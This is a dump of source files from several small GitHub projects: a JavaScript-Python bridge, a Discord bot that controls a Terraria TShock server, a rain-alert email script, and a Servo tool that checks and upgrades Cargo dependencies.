\n* Use `python.exit()` or `process.exit()` at the end to quit the Python process.\n* This library doesn't manage the packaging. \n * Right now you need to install all the deps from pip globally, but later on we may allow loading from pip-envs.\n* When you do a normal Python function call, you can supply \"positional\" arguments, which must \n be in the order the Python function expects.\n* Some Python objects accept arbitrary keyword arguments. You can call these functions by using\n the special `$` function syntax. \n * When you do a function call with a `$` before the parenthesis, such as `await some.pythonCall$()`, \n the final argument is evaluated as a kwarg dictionary. You can supply named arguments this way.\n* Property access with a $ at the end acts as an error suppression operator. \n * Any errors will be ignored and instead undefined will be returned\n* See [docs/javascript.md](docs/javascript.md) for more docs, and the examples for more info; a short sketch of both `$` forms follows\n
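\nA small, hedged sketch of the two `$` conventions (`plt`, `x`, `y` and `might_not_exist` are made-up names for illustration):\n\n```js\n// `$` before the parenthesis: the last argument becomes a kwarg dict\nawait plt.plot$(x, y, { label: 'sin(x)' })\n// trailing `$` on a property: resolves to undefined instead of throwing\nconst maybe = await someObject.might_not_exist$\n```\n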
\n### Usage\n\n<details>\n <summary>👉 Click here to see some code usage examples 👈</summary>\n\n### Basic import\n\nLet's say we have a file in Python like this called `time.py` ...\n```py\nimport datetime\ndef what_time_is_it():\n return str(datetime.datetime.now())\n```\n\nThen we can call it from JavaScript!\n```js\nimport { python } from 'pythonia'\nconst time = await python('./time.py')\nconsole.log(\"It's\", await time.what_time_is_it())\npython.exit()\n```\n\n### Iterating\n\n* When iterating a Python object, you *must* use a `for await` loop instead of a normal `for-of` loop.\n\niter.py\n```py\nimport os\ndef get_files():\n for f in os.listdir():\n yield f\n```\n\niter.js\n```js\nconst iter = await python('./iter.py')\nconst files = await iter.get_files()\nfor await (const file of files) {\n console.log(file)\n}\n```\n</details>\n\n## Details\n* When doing a function call, any foreign objects will be sent to you as a reference. For example,\n if you're in JavaScript and do a function call to Python that returns an array, you won't get a\n JS array back, but you will get a reference to the Python array. You can still access the array\n normally with the [] notation, as long as you use await. If you would like the bridge to turn\n the foreign reference into something native, you can request a primitive value by calling `.valueOf()`\n on the Python array. This would give you a JS array (see the sketch below). It works the same the other way around.\n* The above behavior makes it very fast to pipe data from one function to another, avoiding costly\n conversions.\n* This behavior is not present for callbacks and function parameters. The bridge will try to\n serialize what it can, and will give you a foreign reference if it's unable to serialize something.\n So if you pass a JS object, you'll get a Python dict, but if the dict contains something like a class,\n you'll get a reference in its place.\n
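\nA minimal illustration of `.valueOf()` (the `lib.returns_a_list` name is hypothetical):\n\n```js\nconst arr = await lib.returns_a_list() // foreign reference to a Python list\nconsole.log(await arr[0]) // element access still works, with await\nconst jsArr = await arr.valueOf() // copies the data into a real JS array\n```\n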
\n#### Notable details\n\n* The `ffid` keyword is reserved. You cannot use it in variable names, object keys or values, as this is used to internally track objects.\n* On the bridge to call JavaScript from Python, due to the limitations of Python and cross-platform IPC, we currently communicate over standard error, which means that JSON output in JS standard error can interfere with the bridge. The same issue exists on Windows with Python. You are, however, very unlikely to have issues with this.\n\n* You can set the Node.js/Python binary paths by setting the `NODE_BIN` or `PYTHON_BIN` environment variables before importing the library. Otherwise, the `node` and `python3` or `python` binaries will be called relative to your PATH environment variable. \n" }, { "alpha_fraction": 0.5371459126472473, "alphanum_fraction": 0.5446285605430603, "avg_line_length": 23.387500762939453, "blob_id": "39f3f8957397fc82d8014e064624dd0ba700c331", "content_id": "a86a4b945b584fa2f4e4200bc513f4f4c71b7d92", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1871, "license_type": "permissive", "max_line_length": 113, "num_lines": 80, "path": "/src/pythonia/WebsocketCom.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "const cp = require('child_process')\nconst { join } = require('path')\nconst WS = typeof WebSocket === 'undefined' ? require('ws') : WebSocket\n\nconst log = process.env.DEBUG ? console.log : () => {}\n\nclass StdioCom {\n constructor (ver = 3) {\n this.python = ver === 3 ? 'python3' : 'python2'\n this.handlers = {}\n this.sendQ = []\n this.start()\n }\n\n async start () {\n this.proc = cp.spawn?.(this.python, [join(__dirname, 'ws.py')], { stdio: ['inherit', 'inherit', 'inherit'] })\n\n this.sock = new WS('ws://127.0.0.1:8768/')\n const onMessage = message => {\n const j = JSON.parse(message)\n if (j.c === 'stderr') {\n console.log('PyE', j.val)\n } else if (j.c === 'stdout') {\n console.log('PyO', j.val)\n } else {\n this.recieve(j)\n }\n }\n const onOpen = () => {\n for (const q of this.sendQ) {\n this.sock.send(q)\n }\n }\n this.sock.on?.('message', onMessage)\n this.sock.onmessage = message => onMessage(message.data)\n this.sock.on?.('open', onOpen)\n this.sock.onopen = onOpen\n\n this.proc?.on('error', console.warn)\n }\n\n end () {\n this.proc?.kill()\n this.sock.close()\n }\n\n recieve (j) {\n log('[py -> js]', j)\n if (this.handlers[j.c]) {\n return this.handlers[j.c](j)\n }\n if (this.handlers[j.r]) {\n if (this.handlers[j.r](j)) {\n return\n }\n delete this.handlers[j.r]\n }\n }\n\n register (eventId, cb) {\n this.handlers[eventId] = cb\n }\n\n write (what, cb) {\n log('[js -> py]', what)\n const fb = JSON.stringify(what)\n if (!this.sock) this.sendQ.push(fb)\n else this.sock.send(fb)\n this.register(what.r, cb)\n }\n\n writeRaw (what, r, cb) {\n log('[js -> py]', what)\n if (!this.sock) this.sendQ.push(what)\n else this.sock.send(what)\n this.register(r, cb)\n }\n}\n\nmodule.exports = { StdioCom }\n" } ]
40
AnkisCZ/terraria-bot
https://github.com/AnkisCZ/terraria-bot
056235b1263261340136bd9967a1fdc98219b8d4
fd9e262e5af3a4b2da9f72fe4b7f34143178838a
1f9e533fab4ff003ae31e87f48bd9ea21c4d5794
refs/heads/master
2021-10-21T16:06:28.501032
2019-03-05T00:55:03
2019-03-05T00:55:03
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.745464563369751, "alphanum_fraction": 0.7493128180503845, "avg_line_length": 57.67741775512695, "blob_id": "3ad0da903fe9c43def0f417488cd83e288a3099a", "content_id": "df8de2d70348a5d0b3bac351e6ed2e08bffb31c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1819, "license_type": "no_license", "max_line_length": 256, "num_lines": 31, "path": "/README.md", "repo_name": "AnkisCZ/terraria-bot", "src_encoding": "UTF-8", "text": "# terraria-bot\n\nThis is a simple Terraria bot to control your TShock server from a Discord Channel. To use this feature, you will have to enable [REST Services from your TShock server](https://tshock.readme.io/v4.3.22/reference).\n\n - [TShock Server](https://github.com/Pryaxis/TShock/releases) is required.\n - **startup.bat** - This script should be used to start your TShock server on your windows machine\n - **startup.sh** - This script should be used to start your TShock server on your unix machine (_pending_)\n\n### Tech\n\nTo run terraria-bot you need the following technologies\n\n* [python](https://www.python.org/) - Python version 3.x is required\n* **python libraries** - The file requirements.txt specifies all the required libraries and modules (_produced by pigar_)\n\n### Installation\n\n - **TShock** should be installed and configured to expose REST Services on your localhost.\n - **startup script** should be located at your TShock root folder\n - You have to configure your [Discord Bot Application](https://github.com/SinisterRectus/Discordia/wiki/Setting-up-a-Discord-application)\n - Populate your token on the [bot.py](https://github.com/jobtravaini/terraria-bot/blob/master/Bot.py) constant **TOKEN**\n\n### Configuration\n\n - It is required to [create an Admin user on your TShock Server](https://tshock.readme.io/docs/getting-started)\n - It is required to configure your TShock Admin username and password (_**USERNAME** and **PASSWORD** constants_) on the [server_adapter.py](https://github.com/jobtravaini/terraria-bot/blob/master/tshock/Server.py) file (_REST API requires admin access_)\n \n### Running\n\n - Add your Bot to your Discord Channel. 
\n" }, { "alpha_fraction": 0.6753086447715759, "alphanum_fraction": 0.6753086447715759, "avg_line_length": 35.21739196777344, "blob_id": "da67d859cad3fab95ef77fac9d3dc8a61f956aac", "content_id": "a8f3e665f115093eba654b370741fd14168d1f2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 810, "license_type": "no_license", "max_line_length": 53, "num_lines": 23, "path": "/command/command_map.py", "repo_name": "AnkisCZ/terraria-bot", "src_encoding": "UTF-8", "text": "import tshock.server_adapter as Server\nimport util.ip_handler as ExternalIP\n\n_map = dict()\n\n# [SERVICE, IS_AUTHORIZATION_REQUIRED]\n_map['!ip'] = [ExternalIP.get_my_external_ip, False]\n_map['!status'] = [Server.server_status, False]\n_map['!angler'] = [Server.server_clear_angler, False]\n_map['!restart'] = [Server.server_restart, True]\n_map['!save'] = [Server.save_world, True]\n_map['!night'] = [Server.server_night_time, True]\n_map['!day'] = [Server.server_day_time, True]\n_map['!eclipse'] = [Server.server_eclipse, True]\n_map['!fullmoon'] = [Server.server_full_moon, True]\n_map['!bloodmoon'] = [Server.server_blood_moon, True]\n_map['!rain'] = [Server.server_rain, True]\n_map['!sandstorm'] = [Server.server_sandstorm, True]\n_map['!help'] = [Server.server_help, True]\n\n\ndef get_command_map():\n return _map\n" }, { "alpha_fraction": 0.6929648518562317, "alphanum_fraction": 0.6964824199676514, "avg_line_length": 27.826086044311523, "blob_id": "8463f0be13bb35f702c43f82bc90c0d6a92690dd", "content_id": "5872329bf1e9e75f0da93a7d00e951b159fb9f3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1990, "license_type": "no_license", "max_line_length": 81, "num_lines": 69, "path": "/bot.py", "repo_name": "AnkisCZ/terraria-bot", "src_encoding": "UTF-8", "text": "import time\nimport discord\nimport logging.config\nimport command.command_map as CommandMap\n\nLOG_COMMAND_AUTHORIZATION_GRANTED = 'Service {0}: Authorization Granted'\nLOG_COMMAND_AUTHORIZATION_DENIED = 'Service {0}: Authorization Denied'\nAUTHORIZATION_DENIED_MESSAGE = 'You do not have permission to use this command'\nLOG_COMMAND_PATTERN = 'User {0} invoked {1} command'\nLOG_LOGIN_MESSAGE = 'Logged in. 
Name: {0} - User ID: {1}'\nTOKEN = 'YOUR_TOKEN_HERE'\n\nlogging.config.fileConfig('logging.conf')\nlogger = logging.getLogger(__name__)\n\ncommand_map = CommandMap.get_command_map()\nclient = discord.Client()\n\n\ndef _check_authorization(roles):\n for role in roles:\n if role.name == 'TBotAdmin':\n return True\n\n return False\n\n\ndef _execute_command(message):\n if message.content in command_map:\n logger.info(LOG_COMMAND_PATTERN.format(message.author, message.content))\n service, is_authorization_required = command_map.get(message.content)\n\n if is_authorization_required:\n return _execute_role_based_service(service, message.author.roles)\n else:\n return service()\n\n\ndef _execute_role_based_service(service, roles, *args):\n if _check_authorization(roles):\n logger.info(LOG_COMMAND_AUTHORIZATION_GRANTED.format(service.__name__))\n return service(*args)\n else:\n logger.info(LOG_COMMAND_AUTHORIZATION_DENIED.format(service.__name__))\n return AUTHORIZATION_DENIED_MESSAGE\n\n\[email protected]\nasync def on_message(message):\n if message.author == client.user:\n return\n\n result_message = _execute_command(message)\n\n if result_message:\n await client.send_message(message.channel, result_message)\n\n\[email protected]\nasync def on_ready():\n logger.info(LOG_LOGIN_MESSAGE.format(client.user.name, client.user.id))\n\n\nwhile True:\n try:\n client.loop.run_until_complete(client.start(TOKEN))\n except Exception:\n logger.info('Reconnecting...')\n time.sleep(5)\n\n" }, { "alpha_fraction": 0.6281428337097168, "alphanum_fraction": 0.6352857351303101, "avg_line_length": 27.571428298950195, "blob_id": "ca3f593b8de35cb0707bd10527ed0c9be40eaf6d", "content_id": "e3e32807d6846e606d4e46614025061da671b07c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7000, "license_type": "no_license", "max_line_length": 119, "num_lines": 245, "path": "/tshock/server_adapter.py", "repo_name": "AnkisCZ/terraria-bot", "src_encoding": "UTF-8", "text": "import requests\n\n# BASE\nTOKEN = None\nUSERNAME = 'tbot'\nPASSWORD = 'admin'\n\n# SERVICES\nSERVER_URL = 'http://127.0.0.1:7878'\n\nRESTART_SERVER_SERVICE = SERVER_URL + '/v2/server/off'\nPLAYER_LIST_SERVICE = SERVER_URL + '/v2/players/list'\nTEST_TOKEN_SERVICE = SERVER_URL + '/tokentest'\nSAVE_WORLD_SERVICE = SERVER_URL + '/v2/world/save'\nRAW_CMD_SERVICE = SERVER_URL + '/v3/server/rawcmd'\nSTATUS_SERVICE = SERVER_URL + '/status'\nLOGIN_SERVICE = SERVER_URL + '/v2/token/create'\n\n# MESSAGING\nSERVER_RESTARTING_MESSAGE = 'The Server is restarting...'\nCRITICAL_ERROR_MESSAGE = 'Error. Please, validate with your server provider'\nEMPTY_SERVER_MESSAGE = 'Empty Server'\nWORLD_SAVED_MESSAGE = 'World Saved'\nNIGHT_TIME_MESSAGE = 'Setting Server time to Night (19:30 PM)'\nBLOOD_MOON_MESSAGE = 'The Server is now running a Blood Moon Event'\nFULL_MOON_MESSAGE = 'The Server is now Full Moon Phase'\nSANDSTORM_MESSAGE = 'Sandstorm: {0}'\nDAY_TIME_MESSAGE = 'Setting Server time to Day (04:30 AM)'\nECLIPSE_MESSAGE = 'The Server is now running an Eclipse Event'\nRESTART_MESSAGE = 'The Server will be restarted'\nANGLER_MESSAGE = 'Angler has new quests now'\nGENERIC_ERROR = 'Error. 
Please, restart the server'\nRAIN_MESSAGE = 'Raining: {0}'\nSTATUS_MESSAGE = 'Server Name: {0}\\n' \\\n 'Players: {1}\\n' \\\n 'Running for: {2}'\n\n# Help Message\nHELP_SERVICE_MESSAGE = 'Services:\\n' \\\n '!ip - returns the Server IP\\n' \\\n '!status - returns the Server Status\\n' \\\n '!angler - reset Angler\\'s Quest\\n' \\\n '\\n' \\\n 'Admin Services:\\n' \\\n '!bloodmoon - invoke Blood Moon event\\n' \\\n '!sandstorm - create sandstorms\\n' \\\n '!eclipse - invoke Eclipse event\\n' \\\n '!restart - restart the Server\\n' \\\n '!night - set the time to Night Time (19:30 PM)\\n' \\\n '!save - save the World\\n' \\\n '!rain - set weather to Rain\\n' \\\n '!day - set time to Day Time (04:30 AM)'\n\n# Server State\nrain_state = False\nsandstorm_state = False\n\n\ndef _consume_service(url, parameters=None):\n if parameters:\n return requests.get(url, params=parameters).json()\n else:\n return requests.get(url, params=_get_token()).json()\n\n\ndef _validate_response(response):\n if response and 'status' in response and response['status'] == '200':\n return True\n else:\n return False\n\n\ndef _get_token():\n global TOKEN\n\n if TOKEN and _validate_token():\n return {'token': TOKEN}\n else:\n TOKEN = _consume_service(url=LOGIN_SERVICE, parameters={'username': USERNAME, 'password': PASSWORD})['token']\n return {'token': TOKEN}\n\n\ndef _validate_token():\n response = _consume_service(TEST_TOKEN_SERVICE, parameters={'token': TOKEN})\n\n if _validate_response(response):\n return True\n else:\n return False\n\n\ndef _get_player_list():\n response = _consume_service(PLAYER_LIST_SERVICE)\n\n if _validate_response(response):\n player_list = list()\n players = response['players']\n\n for player in players:\n player_list.append(player['nickname'])\n\n if len(player_list) > 0:\n return ', '.join(player_list)\n else:\n return EMPTY_SERVER_MESSAGE\n else:\n return GENERIC_ERROR\n\n\ndef server_status():\n response = _consume_service(STATUS_SERVICE)\n\n if _validate_response(response):\n return STATUS_MESSAGE.format(response['world'], _get_player_list(), response['uptime'])\n else:\n return GENERIC_ERROR\n\n\ndef save_world():\n response = _consume_service(SAVE_WORLD_SERVICE)\n\n if _validate_response(response):\n return WORLD_SAVED_MESSAGE\n else:\n return GENERIC_ERROR\n\n\ndef server_restart():\n token_parameter = _get_token()\n server_parameter = {'confirm': True, 'message': RESTART_MESSAGE, 'nosave': False}\n parameters = {**token_parameter, **server_parameter}\n\n response = _consume_service(url=RESTART_SERVER_SERVICE, parameters=parameters)\n\n if _validate_response(response):\n return SERVER_RESTARTING_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef _invoke_raw_command(server_parameter):\n token_parameter = _get_token()\n parameters = {**token_parameter, **server_parameter}\n\n return _consume_service(RAW_CMD_SERVICE, parameters=parameters)\n\n\ndef server_night_time():\n server_parameter = {'cmd': '/time 19:30'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return NIGHT_TIME_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_day_time():\n server_parameter = {'cmd': '/time 04:30'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return DAY_TIME_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_eclipse():\n server_parameter = {'cmd': '/eclipse'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if 
_validate_response(response):\n return ECLIPSE_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_full_moon():\n server_parameter = {'cmd': '/fullmoon'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return FULL_MOON_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_rain():\n global rain_state\n\n if rain_state:\n command = 'stop'\n else:\n command = 'start'\n\n server_parameter = {'cmd': '/rain {0}'.format(command)}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n rain_state = not rain_state\n return RAIN_MESSAGE.format(rain_state)\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_sandstorm():\n global sandstorm_state\n\n if sandstorm_state:\n command = 'stop'\n else:\n command = 'start'\n\n server_parameter = {'cmd': '/sandstorm {0}'.format(command)}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n sandstorm_state = not sandstorm_state\n return SANDSTORM_MESSAGE.format(sandstorm_state)\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_blood_moon():\n server_parameter = {'cmd': '/bloodmoon'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return BLOOD_MOON_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_clear_angler():\n server_parameter = {'cmd': '/clearangler'}\n response = _invoke_raw_command(server_parameter=server_parameter)\n\n if _validate_response(response):\n return ANGLER_MESSAGE\n else:\n return CRITICAL_ERROR_MESSAGE\n\n\ndef server_help():\n return HELP_SERVICE_MESSAGE\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6763284802436829, "avg_line_length": 24.875, "blob_id": "414dfb879b09f53a9bbe93a6f076e6b6fc01adff", "content_id": "8fb42889f6c8f052cd85cd32d3391b98c2be66d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 87, "num_lines": 8, "path": "/util/ip_handler.py", "repo_name": "AnkisCZ/terraria-bot", "src_encoding": "UTF-8", "text": "import urllib.request\n\n\ndef get_my_external_ip():\n external_ip = urllib.request.urlopen('https://api.ipify.org').read().decode('utf8')\n result = 'Server IP: {0}'.format(external_ip)\n\n return result\n" } ]
5
sompodsign/Rain-Alert
https://github.com/sompodsign/Rain-Alert
1db93c465c73fb795012b9dba07291909f2d6a6b
182075062356ff5dcfd01fe5033be5c13556e85b
661bf20827f0bdba47eabe071238c9b8e551c9bc
refs/heads/master
2023-02-23T11:49:07.789703
2021-01-30T16:16:47
2021-01-30T16:16:47
334,455,974
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5894187688827515, "alphanum_fraction": 0.6400893926620483, "avg_line_length": 26.387754440307617, "blob_id": "5221df96ffdaadbe380703fd7c8dfbc5812043fc", "content_id": "c1d436a98c7d97d00156255468904ca7ea6fa6c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1342, "license_type": "no_license", "max_line_length": 101, "num_lines": 49, "path": "/main.py", "repo_name": "sompodsign/Rain-Alert", "src_encoding": "UTF-8", "text": "import requests\nfrom smtplib import SMTP\n\n# Credentials for SMS system\n# import os\n# from twilio.rest import Client\n# account_sid = os.environ['']\n# auth_token = os.environ['']\n\nMAIL = \"\"\nPASSWORD = \"\"\n\nURL = \"https://api.openweathermap.org/data/2.5/onecall\"\napi_key = \"ddd5823d8829e48f928fb910ed78ab8c\"\nweather_params = {\n \"lat\": 23.822350,\n \"lon\": 90.365417,\n \"appid\": api_key,\n \"exclude\": \"current,minutely,daily\",\n}\n\nresponse = requests.get(URL, params=weather_params)\nresponse.raise_for_status()\nhourly = response.json()[\"hourly\"][0:12]\ngoing_to_rain = False\n\nfor hour in hourly:\n if hour[\"weather\"][0][\"id\"] < 600:\n going_to_rain = True\nif going_to_rain:\n # EMAIL SYSTEM\n with SMTP(\"smtp.gmail.com\") as connection:\n connection.starttls()\n connection.login(user=MAIL, password=PASSWORD)\n message = \"Subject: Rain\\n\\nIt's going to rain today. Bring an Umbrella with you.\\n\\nShampad\"\n connection.sendmail(from_addr=\"[email protected]\", to_addrs=\"[email protected]\", msg=message)\n connection.close()\n\n # SMS SYSTEM\n\n # client = Client(account_sid, auth_token)\n # message = client.messages \\\n # .create(\n # body=\"It's going to rain today. Bring an UMBRELLA with you.\",\n # from_='+12057549231',\n # to='+8801521239970'\n # )\n #\n # print(message.status)\n" } ]
1
chbrown13/servo-dependency-tool
https://github.com/chbrown13/servo-dependency-tool
5300c67c2ba126f0910bc1cb3a8746827940f052
8c2dece7967d8f8a67d35e31270f08fb30fedf92
ec6eca2f04b365f18a6f6c65df9364a2330f2833
refs/heads/master
2021-01-21T10:42:31.122605
2017-03-23T02:33:32
2017-03-23T02:33:32
83,477,063
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7235476970672607, "alphanum_fraction": 0.7427386045455933, "avg_line_length": 32.77193069458008, "blob_id": "164eba2847bcee7c01075867f942aa810f16b3f1", "content_id": "151806c0f3ad639bd981fde95e1728394b30efbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1928, "license_type": "no_license", "max_line_length": 83, "num_lines": 57, "path": "/test/test_cargo_lock_parser.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "import unittest\nimport os\nimport sys\npath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nsys.path.insert(0,path)\nimport cargo_lock_parser as parser\nfrom cargo_lock_parser import LockRoot, LockDependency, LockPackage, LockFile\n\nclass TestCargoLockParser(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.path = os.path.join(path,\"test\")\n\n\t\tself.root = LockRoot()\n\t\tself.root.name = \"webvr_traits\"\n\t\tself.root.version = \"0.0.1\"\n\n\t\tself.depend1 = LockDependency()\n\t\tself.depend1.name = \"ipc-channel\"\n\t\tself.depend1.version = \"0.7.0\"\n\t\tself.depend1.source = \"(registry+https://github.com/rust-lang/crates.io-index)\"\n\n\t\tself.package = LockPackage()\n\t\tself.package.name = \"servo\"\n\t\tself.package.version = \"0.0.1\"\n\t\tself.package.source = \"\"\n\n\t\tself.depend2 = LockDependency()\n\t\tself.depend2.name = \"android_injected_glue\"\n\t\tself.depend2.version = \"0.2.1\"\n\t\tself.depend2.source = \"(git+https://github.com/mmatyas/android-rs-injected-glue)\"\n\n\tdef test_lock_file_parse(self):\n\t\tfile = parser.lock_file_parse(\"Cargo.lock\")\n\t\tself.assertEqual(type(file),LockFile)\n\t\t\n\t\troot = file.root\n\t\tself.assertEqual(root.name,self.root.name)\n\t\tself.assertEqual(root.version,self.root.version)\n\t\tself.assertEqual(len(root.dependencies),5)\n\n\t\tself.assertEqual(root.dependencies[0].name,self.depend1.name)\n\t\tself.assertEqual(root.dependencies[0].version,self.depend1.version)\n\t\tself.assertEqual(root.dependencies[0].source,self.depend1.source)\n\n\t\tself.assertEqual(len(file.packages),319)\n\t\tpkg = file.packages[\"servo\"]\n\t\tself.assertEqual(pkg.name,self.package.name)\n\t\tself.assertEqual(pkg.version,self.package.version)\n\t\tself.assertEqual(pkg.source,self.package.source)\n\t\tself.assertFalse(pkg.upgrade_available)\n\n\t\tself.assertEqual(len(pkg.dependencies),18)\n\t\tdpd = pkg.dependencies[0]\n\t\tself.assertEqual(dpd.name,self.depend2.name)\n\t\tself.assertEqual(dpd.version,self.depend2.version)\n\t\tself.assertEqual(dpd.source,self.depend2.source)\n\n\n\n" }, { "alpha_fraction": 0.7552083134651184, "alphanum_fraction": 0.7604166865348816, "avg_line_length": 26.428571701049805, "blob_id": "3eac5d81293794329897a766fdfa7357db74f794", "content_id": "cdd438ea802194c6912da4a8543ba38a01f00b7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 69, "num_lines": 7, "path": "/setup.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "from distutils.core import setup\n\nsetup(\n name='servo-dependency-tool',\n description='Tool for automatically upgrading Cargo dependencies.',\n install_requires=['gitpython','github3.py'],\n)\n" }, { "alpha_fraction": 0.5777778029441833, "alphanum_fraction": 0.5815972089767456, "avg_line_length": 26.169811248779297, "blob_id": "8958f81bbd409fe687f37ca2c2b2d4cce91970d0", "content_id": 
"56dd6db64879b8ed29fc9f249b63d17aeaee8997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2880, "license_type": "no_license", "max_line_length": 109, "num_lines": 106, "path": "/crates_io_checker.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "from git import Repo, Remote\nimport git\nimport os\nimport platform\nimport json\nimport repo_management\n\nCRATES = \"crates.io-index\"\n\ndepend = {}\n\n\n# Delete repo and files when done\ndef cleanup():\n if platform.system() == \"Windows\":\n rm = 'rmdir /S /Q \"%s\"' % CRATES\n else:\n rm = \"rm -rf %s\" % CRATES\n os.system(rm)\n\n\n# Check for upgrades for input packages\ndef check_upgrade(package):\n if package.name not in depend.keys():\n # Error somewhere\n print(\"Package not found\")\n return False\n else:\n # Check input version vs latest version\n current = package.version\n latest = depend[package.name][-1][\"vers\"]\n print(\"Checking for '%s' upgrades... current= %s, latest= %s\" % (package.name, current, latest))\n package.version = latest\n return current != latest\n\n\n# Read dependency information from crates.io-index file and store in dict\ndef read_file(path):\n if path is None:\n return\n filename = os.path.basename(path)\n d = []\n with open(path, 'r') as f:\n for line in f:\n d.append(json.loads(line))\n depend[filename] = d\n\n\n# Check if file is in the current path\ndef check_folder(name, path):\n try:\n if name in os.listdir(path):\n file = os.path.join(path, name)\n return file\n except FileNotFoundError:\n return None\n return None\n\n\n# Check if a package exists in crates.io-index\ndef check_package(package):\n file = None\n pack = package.name\n if len(pack) > 3:\n split = [pack[i:i+2] for i in range(0, len(pack), 2)]\n path = os.path.join(CRATES, split[0])\n i = 0\n while file is None:\n i += 1\n if os.path.exists(path):\n file = check_folder(pack, path)\n else:\n # path doesn't exist\n break\n try:\n path = os.path.join(path, split[i])\n except IndexError:\n break\n else:\n if len(pack) == 3:\n file = check_folder(pack, os.path.join(CRATES, \"3\", pack[0]))\n else:\n file = check_folder(pack, os.path.join(CRATES, str(len(pack))))\n\n if file is None:\n print(\"Package '%s' Not Found\" % pack)\n return\n else:\n # print(\"Found package '%s'\"%pack)\n return file\n\n\ndef clone_crates():\n try:\n print(\"Cloning crates.io-index repository...(This may take a while)\") # Git submodules may avoid this\n repo = Repo.clone_from(\"https://github.com/rust-lang/crates.io-index.git\", CRATES)\n except git.exc.GitCommandError:\n # crates.io-index repo already exists\n git_path = os.path.abspath(os.path.join(os.path.dirname((CRATES)),CRATES))\n repo_management.pull(git_path)\n\n\ndef check(p):\n f = check_package(p)\n read_file(f)\n p.upgrade_available = check_upgrade(p)\n" }, { "alpha_fraction": 0.7161065936088562, "alphanum_fraction": 0.7172653675079346, "avg_line_length": 29.714284896850586, "blob_id": "d0e809509cdd8c960e4a5c06fe328046573187c6", "content_id": "167fce87e205b7ef14b933dd5a644286a624f426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 863, "license_type": "no_license", "max_line_length": 69, "num_lines": 28, "path": "/test/test_cargo_toml_updater.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "import unittest\nimport os\nimport sys\npath = os.path.abspath(os.path.join(os.path.dirname(__file__), 
'..'))\nsys.path.insert(0,path)\nimport cargo_toml_updater as updater\nfrom cargo_lock_parser import lock_file_parse\n\nclass TestCargoTOMLUpdater(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.lock_file = lock_file_parse(\"Cargo.lock\")\n\t\tself.lock_file.packages[\"servo\"].upgrade_available = True\n\t\tself.lock_file.packages[\"toml\"].upgrade_available = True\n\t\tself.lock_file.packages[\"rustc-serialize\"].upgrade_available = True\n\n\t\twith open(\"Cargo.toml\",'r') as f:\n\t\t\tself.original = f.read()\n\n\tdef test_toml_file_update(self):\n\t\tupdater.toml_file_update(\"Cargo.toml\",self.lock_file)\n\t\twith open(\"Cargo.toml\",'r') as f:\n\t\t\tupdate = f.read()\n\t\tself.assertNotEqual(self.original,update)\n\n\tdef tearDown(self):\n\t\twith open(\"Cargo.toml\",'w') as f:\n\t\t\tf.write(self.original)\n\t\t\n" }, { "alpha_fraction": 0.6639566421508789, "alphanum_fraction": 0.6653116345405579, "avg_line_length": 38.254547119140625, "blob_id": "b9b2a8e53720d8f76a7cd3265dc8b5e24671cae8", "content_id": "07a9c8abce07fcad315762c06933fb39317451d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2214, "license_type": "no_license", "max_line_length": 118, "num_lines": 55, "path": "/repo_management.py", "repo_name": "chbrown13/servo-dependency-tool", "src_encoding": "UTF-8", "text": "from git import Repo, Remote\r\nfrom github3 import login\r\nimport git\r\nimport traceback\r\n\r\n\r\n# Function that takes the local git clone directory path and the new branch name as parameters\r\n# and creates a new branch in both the local repository and the remote\r\ndef create_new_branch(path, branch_name):\r\n repo = Repo(path)\r\n new_branch = repo.create_head(branch_name)\r\n new_branch.commit\r\n repo.git.push(\"origin\", branch_name)\r\n\r\n\r\n# Function 